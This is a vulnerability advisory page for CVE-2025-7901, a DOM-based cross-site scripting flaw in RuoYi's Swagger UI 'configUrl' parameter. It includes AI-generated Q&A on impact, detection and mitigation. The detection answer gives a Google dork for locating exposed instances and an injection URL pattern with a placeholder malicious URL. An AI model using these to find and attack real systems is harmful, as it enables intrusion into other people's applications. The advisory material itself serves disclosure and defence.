CVE-2025-7901
BaseFortify
Publication date: 2025-07-20
Last updated on: 2025-09-11
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| ruoyi | ruoyi | to 4.8.1 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-7901 is a DOM-based Cross-Site Scripting (XSS) vulnerability in yangzongzhuan RuoYi versions up to 4.8.1, specifically affecting the Swagger UI component at /swagger-ui/index.html. The vulnerability arises from improper access control and handling of the user-controllable argument 'configUrl', which is not properly sanitized before being embedded in the web page. This allows attackers to inject and execute malicious JavaScript in the victim's browser. Additionally, an Insecure Direct Object Reference (IDOR) flaw allows attackers to access internal API documentation without authentication, increasing the attack surface. The vulnerability exploits Swagger UI's feature to load external API specifications insecurely, leading to potential account takeovers or other attacks. [1, 2, 3]
How can this vulnerability impact me? :
This vulnerability can impact you by allowing remote attackers to execute arbitrary scripts in your browser when accessing the affected Swagger UI interface. This can lead to unauthorized access to internal API documentation, compromise of data integrity, and potentially account takeovers or other malicious actions. Since the attack requires no authentication and can be initiated remotely, it poses a significant security risk, especially if users interact with the vulnerable Swagger UI endpoint. [1, 2, 3]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by identifying instances of the vulnerable Swagger UI endpoint exposed on your network or system. You can use Google dorking with the query `inurl:swagger-ui/index.html` to find potentially affected targets. Additionally, you can test the endpoint by accessing the URL with the `configUrl` parameter to see if it improperly executes scripts, for example by visiting `/swagger-ui/index.html?configUrl=<malicious_url>`. There are no specific commands provided, but scanning for the presence of the Swagger UI endpoint and testing the `configUrl` parameter for script injection can help detect the vulnerability. [2, 3]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the Swagger UI endpoints to authorized users only, as the vulnerability arises from improper access control. Since no known effective mitigations or patches currently exist, consider disabling or removing the Swagger UI component if possible. Alternatively, replace the affected Swagger UI component with a secure alternative that properly sanitizes input parameters like `configUrl`. Monitoring and limiting exposure of internal API documentation interfaces is also recommended. [1, 2, 3]